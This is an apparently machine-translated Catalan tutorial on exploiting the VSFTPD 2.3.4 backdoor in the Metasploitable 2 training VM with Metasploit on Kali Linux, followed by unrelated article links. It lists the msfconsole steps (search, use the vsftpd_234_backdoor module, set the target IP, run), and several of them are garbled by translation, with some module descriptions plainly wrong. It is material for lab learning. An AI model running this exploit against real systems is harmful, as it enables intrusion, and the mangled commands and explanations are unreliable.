Metasploit a Kali Linux 2020

Metasploit Kali Linux 2020



Proves de penetració amb Kali Linux


Internet està ple d’amagadors amb intents maliciosos que volen accedir a les xarxes i explotar les seves dades evitant la detecció. Només té sentit garantir la seguretat d’una xarxa mesurant les seves vulnerabilitats. Les proves de penetració o pirateig ètic són la manera com provem les xarxes o els servidors per a objectius embarassables identificant tots els possibles incompliments que un pirata informàtic podria utilitzar per accedir-hi, reduint així els compromisos de seguretat. Les proves de penetració es realitzen sovint mitjançant aplicacions de programari, la més popular de les quals és Kali Linux, preferiblement amb el marc Metasploit. Estigueu fins al final per aprendre a provar un sistema executant un atac amb Kali Linux.

Una introducció al framework Kali Linux i Metasploit

Kali Linux és una de les moltes eines avançades de seguretat del sistema desenvolupades (i actualitzades regularment) per Offensive Security. És un sistema operatiu basat en Linux que inclou un conjunt d’eines concebudes principalment per a proves de penetració. És bastant fàcil d'utilitzar (almenys si es compara amb altres programes de prova de bolígrafs) i és prou complicat per donar resultats adequats.





El Marc de Metasploit és una plataforma de proves de penetració modular de codi obert que s’utilitza per atacar sistemes per comprovar si hi ha exploits de seguretat. És una de les eines de prova de penetració més utilitzades i està integrat a Kali Linux.



Metasploit consta de magatzem de dades i mòduls. Datastore permet a l'usuari configurar els aspectes dins del marc, mentre que els mòduls són fragments de codis autònoms dels quals Metasploit deriva les seves característiques. Com que ens centrem en l'execució d'un atac per a proves de bolígrafs, mantindrem el debat en mòduls.



En total, hi ha cinc mòduls:



Explotar - eludeix la detecció, entra al sistema i penja el mòdul de càrrega útil
Càrrega útil - Permet a l’usuari l’accés al sistema
Auxiliar –Admet incompliments realitzant tasques no relacionades amb l’explotació
Publicació - Operació - permet un major accés al sistema ja compromès
NOP generador - s'utilitza per evitar les adreces IP de seguretat

Als nostres propòsits, utilitzarem mòduls Exploit i de càrrega útil per accedir al nostre sistema objectiu.



Configuració del laboratori de proves de bolígrafs

Necessitarem el programari següent:

Kali Linux:

Kali Linux s’operarà des del nostre maquinari local. Utilitzarem el seu marc Metasploit per localitzar les explotacions.

Un hipervisor:

Necessitarem un hipervisor, ja que ens permet crear un màquina virtual , que ens permet treballar simultàniament en més d’un sistema operatiu. És un requisit previ essencial per a les proves de penetració. Per obtenir una navegació fluida i millors resultats, es recomana utilitzar qualsevol dels dos virtualbox o bé Microsoft Hyper-V per crear la màquina virtual activada .

Metasploitable 2

No s’ha de confondre amb Metasploit, que és un framework de Kali Linux, metasploitable és una màquina virtual intencionalment vulnerable programada per formar professionals de la ciberseguretat. Metasploitable 2 té tones de vulnerabilitats verificables conegudes que podem explotar i hi ha prou informació disponible al web per ajudar-nos a començar.

Tot i que atacar el sistema virtual a Metasploitable 2 és fàcil perquè les vulnerabilitats estan ben documentades, necessiteu molta més experiència i paciència amb màquines i xarxes reals per a les quals realitzareu la prova de penetració. Però l’ús de metasploitable 2 per a proves de bolígrafs serveix com un excel·lent punt de partida per conèixer el mètode.

Utilitzarem metasploitable 2 per continuar la nostra prova de ploma. No necessiteu molta memòria d'ordinador perquè aquesta màquina virtual funcioni, un espai de disc dur de 10 GB i 512 MB de RAM hauria de funcionar bé. Assegureu-vos de canviar la configuració de xarxa de Metasploitable a l’adaptador només per a host mentre l’instal·leu. Un cop instal·lat, inicieu Metasploitable i inicieu la sessió. Inicieu Kali Linux perquè puguem treballar el seu marc Metasploit per iniciar les nostres proves.

Explotació de VSFTPD v2.3.4 Execució d’ordres de portes posteriors

Amb totes les coses al seu lloc, finalment podem buscar una vulnerabilitat per explotar. Podeu cercar diferents vulnerabilitats al web, però, per a aquest tutorial, veurem com es pot explotar VSFTPD v2.3.4. VSFTPD significa un dimoni FTP molt segur. L’hem triat molt bé perquè ens atorga accés complet a la interfície de Metasploitable sense demanar permís.

Inicieu la consola Metasploit. Aneu a l’indicador d’ordres de Kali Linux i introduïu el codi següent:

$suomsfconsole

Amb la consola oberta, escriviu:

$cerca vsftpd

Això fa aparèixer la ubicació de la vulnerabilitat que volem explotar. Per seleccionar-lo, escriviu

$utilitzar exploit/unix/ftp/vsftpd_234_backdoor

Per veure quina informació addicional és necessària per arrencar l'explotació, escriviu

$mostra les opcions

L’única informació que falta d’una importància substancial és la IP, que la proporcionarem.

Cerqueu l’adreça IP al metasploitable escrivint

$ifconfig

Al seu intèrpret d'ordres

L'adreça IP es troba al principi de la segona línia, com ara

#inet addr: 10.0.2.15

Escriviu aquesta ordre per dirigir Metasploit al sistema de destinació i comenceu l'explotació. Estic fent servir la meva IP, però donarà lloc a un error, però, si utilitzeu una IP de víctima diferent, obtindreu resultats de l'explotació

$conjuntESCOLTA[IP de la víctima]

$correr

Ara, amb l’accés complet concedit a Metasploitable, podem navegar pel sistema sense restriccions. Podeu descarregar qualsevol informació classificada o eliminar qualsevol cosa important del servidor. En situacions reals, on un blackhat accedeix a un servidor d’aquest tipus, fins i tot poden apagar la CPU i provocar un bloqueig de qualsevol altre equip connectat.

Acabant les coses

És millor eliminar prèviament els problemes abans que reaccionar-hi. Les proves de penetració us poden estalviar moltes molèsties i posar-vos al dia quan es tracta de la seguretat dels vostres sistemes, ja sigui un equip informàtic únic o tota una xarxa. Amb això en ment, és útil tenir coneixements bàsics sobre proves de bolígrafs. Metasploitable és una excel·lent eina per aprendre els elements essencials, ja que les seves vulnerabilitats són ben conegudes, de manera que hi ha molta informació. Només hem treballat en un exploit amb Kali Linux, però us recomanem que aprofundeixis en ells.

Metasploit

Categoria

Entrades Populars

Com generar un hash de fitxers MD5 a Node.js?

Sincronització d'esbossos entre IDE 2.0 i Arduino Cloud

Com llegir entrades consecutives amb el mòdul Readline Node.js?

Quina és l'alternativa de JavaScript a la funció de dormir?

Com configurar la memòria cau de Varnish a Ubuntu 18.04

Com utilitzar els elements de matriu a MATLAB

Com trobar la inversa d'una funció a MATLAB fent servir el invers

Com canviar la imatge de fons en JavaScript

Com afegir una dimensió a un tensor a PyTorch?

Mostra el camí complet a la barra d'adreces per a carpetes especials a Windows 10: Winhelponline

Com marcar/desmarcar la casella de selecció mitjançant JavaScript

Com tornar a carregar una pàgina amb JavaScript

Com detectar la clau de pestanya a JavaScript

Com etiquetar els vostres recursos d'AWS per a una millor organització?

AWS: No s'ha trobat l'ordre

Com descarregar i instal·lar el navegador Safari a Windows

Monitorització del sistema Raspberry Pi mitjançant btop++

Puc penjar el meu fitxer d'àudio que sembla un missatge de veu a Discord?

Elasticsearch Activa l'inici de sessió anònim

Com instal·lar Memcached a Windows